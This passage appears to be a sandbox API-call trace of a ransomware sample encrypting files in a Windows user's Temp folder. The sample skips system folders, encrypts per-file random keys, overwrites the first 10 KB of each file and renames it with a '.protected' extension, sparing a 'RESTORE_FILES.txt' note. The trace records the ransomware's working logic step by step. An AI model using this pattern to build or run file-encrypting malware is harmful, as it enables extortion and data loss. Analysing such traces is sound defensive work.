(lpString1="2glu0d7uHzfV6.jpg", lpString2="Program Files (x86)") returned -1 [0086.745] lstrcmpiW (lpString1="2glu0d7uHzfV6.jpg", lpString2="$Recycle.bin") returned 1 [0086.745] lstrcmpiW (lpString1="2glu0d7uHzfV6.jpg", lpString2="System Volume Information") returned -1 [0086.745] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\2glu0d7uHzfV6.jpg") returned 70 [0086.745] StrStrIW (lpFirst="2glu0d7uHzfV6.jpg", lpSrch=".protected") returned 0x0 [0086.745] lstrcmpW (lpString1="2glu0d7uHzfV6.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0086.745] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.745] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.745] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\2glu0d7uHzfV6.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\2glu0d7uhzfv6.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.745] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\2glu0d7uHzfV6.jpg") returned 70 [0086.745] StrStrW (lpFirst="2glu0d7uHzfV6.jpg", lpSrch=".txt") returned 0x0 [0086.745] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\2glu0d7uHzfV6.jpg") returned 70 [0086.746] StrStrW (lpFirst="2glu0d7uHzfV6.jpg", lpSrch=".rar") returned 0x0 [0086.746] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\2glu0d7uHzfV6.jpg") returned 70 [0086.746] StrStrW (lpFirst="2glu0d7uHzfV6.jpg", lpSrch=".zip") returned 0x0 [0086.746] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.746] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.746] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.747] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.747] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.747] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.747] CloseHandle (hObject=0xd8) returned 1 [0086.748] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\2glu0d7uHzfV6.jpg.protected") returned 80 [0086.748] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\2glu0d7uHzfV6.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\2glu0d7uhzfv6.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\2glu0d7uHzfV6.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\2glu0d7uhzfv6.jpg.protected")) returned 1 [0086.749] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.749] lstrcmpiW (lpString1="8L27THzvspU.avi", lpString2="Windows") returned -1 [0086.749] lstrcmpiW (lpString1="8L27THzvspU.avi", lpString2="Program Files") returned -1 [0086.749] lstrcmpiW (lpString1="8L27THzvspU.avi", lpString2="Program Files (x86)") returned -1 [0086.749] lstrcmpiW (lpString1="8L27THzvspU.avi", lpString2="$Recycle.bin") returned 1 [0086.749] lstrcmpiW (lpString1="8L27THzvspU.avi", lpString2="System Volume Information") returned -1 [0086.749] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8L27THzvspU.avi") returned 68 [0086.749] StrStrIW (lpFirst="8L27THzvspU.avi", lpSrch=".protected") returned 0x0 [0086.749] lstrcmpW (lpString1="8L27THzvspU.avi", lpString2="RESTORE_FILES.txt") returned -1 [0086.749] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.750] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.750] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8L27THzvspU.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8l27thzvspu.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.750] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8L27THzvspU.avi") returned 68 [0086.750] StrStrW (lpFirst="8L27THzvspU.avi", lpSrch=".txt") returned 0x0 [0086.750] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8L27THzvspU.avi") returned 68 [0086.750] StrStrW (lpFirst="8L27THzvspU.avi", lpSrch=".rar") returned 0x0 [0086.750] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8L27THzvspU.avi") returned 68 [0086.750] StrStrW (lpFirst="8L27THzvspU.avi", lpSrch=".zip") returned 0x0 [0086.750] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.751] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.751] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.752] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.752] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.752] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.752] CloseHandle (hObject=0xd8) returned 1 [0086.752] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8L27THzvspU.avi.protected") returned 78 [0086.753] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8L27THzvspU.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8l27thzvspu.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8L27THzvspU.avi.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8l27thzvspu.avi.protected")) returned 1 [0086.754] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.754] lstrcmpiW (lpString1="9yt Tv-cP5-7sI.bmp", lpString2="Windows") returned -1 [0086.754] lstrcmpiW (lpString1="9yt Tv-cP5-7sI.bmp", lpString2="Program Files") returned -1 [0086.754] lstrcmpiW (lpString1="9yt Tv-cP5-7sI.bmp", lpString2="Program Files (x86)") returned -1 [0086.754] lstrcmpiW (lpString1="9yt Tv-cP5-7sI.bmp", lpString2="$Recycle.bin") returned 1 [0086.754] lstrcmpiW (lpString1="9yt Tv-cP5-7sI.bmp", lpString2="System Volume Information") returned -1 [0086.754] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\9yt Tv-cP5-7sI.bmp") returned 71 [0086.754] StrStrIW (lpFirst="9yt Tv-cP5-7sI.bmp", lpSrch=".protected") returned 0x0 [0086.754] lstrcmpW (lpString1="9yt Tv-cP5-7sI.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0086.754] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.754] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\9yt Tv-cP5-7sI.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\9yt tv-cp5-7si.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.755] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\9yt Tv-cP5-7sI.bmp") returned 71 [0086.755] StrStrW (lpFirst="9yt Tv-cP5-7sI.bmp", lpSrch=".txt") returned 0x0 [0086.755] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\9yt Tv-cP5-7sI.bmp") returned 71 [0086.755] StrStrW (lpFirst="9yt Tv-cP5-7sI.bmp", lpSrch=".rar") returned 0x0 [0086.755] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\9yt Tv-cP5-7sI.bmp") returned 71 [0086.755] StrStrW (lpFirst="9yt Tv-cP5-7sI.bmp", lpSrch=".zip") returned 0x0 [0086.755] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.756] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.756] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.757] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.757] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.757] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.757] CloseHandle (hObject=0xd8) returned 1 [0086.758] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\9yt Tv-cP5-7sI.bmp.protected") returned 81 [0086.758] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\9yt Tv-cP5-7sI.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\9yt tv-cp5-7si.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\9yt Tv-cP5-7sI.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\9yt tv-cp5-7si.bmp.protected")) returned 1 [0086.759] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.759] lstrcmpiW (lpString1="AdobeARM.log", lpString2="Windows") returned -1 [0086.759] lstrcmpiW (lpString1="AdobeARM.log", lpString2="Program Files") returned -1 [0086.759] lstrcmpiW (lpString1="AdobeARM.log", lpString2="Program Files (x86)") returned -1 [0086.759] lstrcmpiW (lpString1="AdobeARM.log", lpString2="$Recycle.bin") returned 1 [0086.759] lstrcmpiW (lpString1="AdobeARM.log", lpString2="System Volume Information") returned -1 [0086.759] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log") returned 65 [0086.759] StrStrIW (lpFirst="AdobeARM.log", lpSrch=".protected") returned 0x0 [0086.759] lstrcmpW (lpString1="AdobeARM.log", lpString2="RESTORE_FILES.txt") returned -1 [0086.759] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.759] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.759] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\adobearm.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.760] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log") returned 65 [0086.760] StrStrW (lpFirst="AdobeARM.log", lpSrch=".txt") returned 0x0 [0086.760] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log") returned 65 [0086.760] StrStrW (lpFirst="AdobeARM.log", lpSrch=".rar") returned 0x0 [0086.760] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log") returned 65 [0086.760] StrStrW (lpFirst="AdobeARM.log", lpSrch=".zip") returned 0x0 [0086.760] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2c3, lpOverlapped=0x0) returned 1 [0086.761] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xfffffd3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.761] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2c3, lpOverlapped=0x0) returned 1 [0086.761] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.762] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.762] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.762] CloseHandle (hObject=0xd8) returned 1 [0086.762] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log.protected") returned 75 [0086.762] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\adobearm.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\adobearm.log.protected")) returned 1 [0086.764] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.764] lstrcmpiW (lpString1="b216xYQc4dbOqNDNEB5.wav", lpString2="Windows") returned -1 [0086.764] lstrcmpiW (lpString1="b216xYQc4dbOqNDNEB5.wav", lpString2="Program Files") returned -1 [0086.764] lstrcmpiW (lpString1="b216xYQc4dbOqNDNEB5.wav", lpString2="Program Files (x86)") returned -1 [0086.764] lstrcmpiW (lpString1="b216xYQc4dbOqNDNEB5.wav", lpString2="$Recycle.bin") returned 1 [0086.764] lstrcmpiW (lpString1="b216xYQc4dbOqNDNEB5.wav", lpString2="System Volume Information") returned -1 [0086.764] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\b216xYQc4dbOqNDNEB5.wav") returned 76 [0086.764] StrStrIW (lpFirst="b216xYQc4dbOqNDNEB5.wav", lpSrch=".protected") returned 0x0 [0086.764] lstrcmpW (lpString1="b216xYQc4dbOqNDNEB5.wav", lpString2="RESTORE_FILES.txt") returned -1 [0086.764] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.764] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\b216xYQc4dbOqNDNEB5.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\b216xyqc4dboqndneb5.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.764] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\b216xYQc4dbOqNDNEB5.wav") returned 76 [0086.764] StrStrW (lpFirst="b216xYQc4dbOqNDNEB5.wav", lpSrch=".txt") returned 0x0 [0086.764] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\b216xYQc4dbOqNDNEB5.wav") returned 76 [0086.764] StrStrW (lpFirst="b216xYQc4dbOqNDNEB5.wav", lpSrch=".rar") returned 0x0 [0086.764] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\b216xYQc4dbOqNDNEB5.wav") returned 76 [0086.765] StrStrW (lpFirst="b216xYQc4dbOqNDNEB5.wav", lpSrch=".zip") returned 0x0 [0086.765] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.765] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.765] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.766] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.766] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.766] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.766] CloseHandle (hObject=0xd8) returned 1 [0086.767] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\b216xYQc4dbOqNDNEB5.wav.protected") returned 86 [0086.767] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\b216xYQc4dbOqNDNEB5.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\b216xyqc4dboqndneb5.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\b216xYQc4dbOqNDNEB5.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\b216xyqc4dboqndneb5.wav.protected")) returned 1 [0086.768] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.768] lstrcmpiW (lpString1="CB2RyEvFAWK7v0b3Rq.mkv", lpString2="Windows") returned -1 [0086.768] lstrcmpiW (lpString1="CB2RyEvFAWK7v0b3Rq.mkv", lpString2="Program Files") returned -1 [0086.768] lstrcmpiW (lpString1="CB2RyEvFAWK7v0b3Rq.mkv", lpString2="Program Files (x86)") returned -1 [0086.768] lstrcmpiW (lpString1="CB2RyEvFAWK7v0b3Rq.mkv", lpString2="$Recycle.bin") returned 1 [0086.768] lstrcmpiW (lpString1="CB2RyEvFAWK7v0b3Rq.mkv", lpString2="System Volume Information") returned -1 [0086.768] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CB2RyEvFAWK7v0b3Rq.mkv") returned 75 [0086.768] StrStrIW (lpFirst="CB2RyEvFAWK7v0b3Rq.mkv", lpSrch=".protected") returned 0x0 [0086.768] lstrcmpW (lpString1="CB2RyEvFAWK7v0b3Rq.mkv", lpString2="RESTORE_FILES.txt") returned -1 [0086.768] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.768] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.768] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CB2RyEvFAWK7v0b3Rq.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cb2ryevfawk7v0b3rq.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.769] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CB2RyEvFAWK7v0b3Rq.mkv") returned 75 [0086.769] StrStrW (lpFirst="CB2RyEvFAWK7v0b3Rq.mkv", lpSrch=".txt") returned 0x0 [0086.769] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CB2RyEvFAWK7v0b3Rq.mkv") returned 75 [0086.769] StrStrW (lpFirst="CB2RyEvFAWK7v0b3Rq.mkv", lpSrch=".rar") returned 0x0 [0086.769] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CB2RyEvFAWK7v0b3Rq.mkv") returned 75 [0086.769] StrStrW (lpFirst="CB2RyEvFAWK7v0b3Rq.mkv", lpSrch=".zip") returned 0x0 [0086.769] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.770] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.770] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, 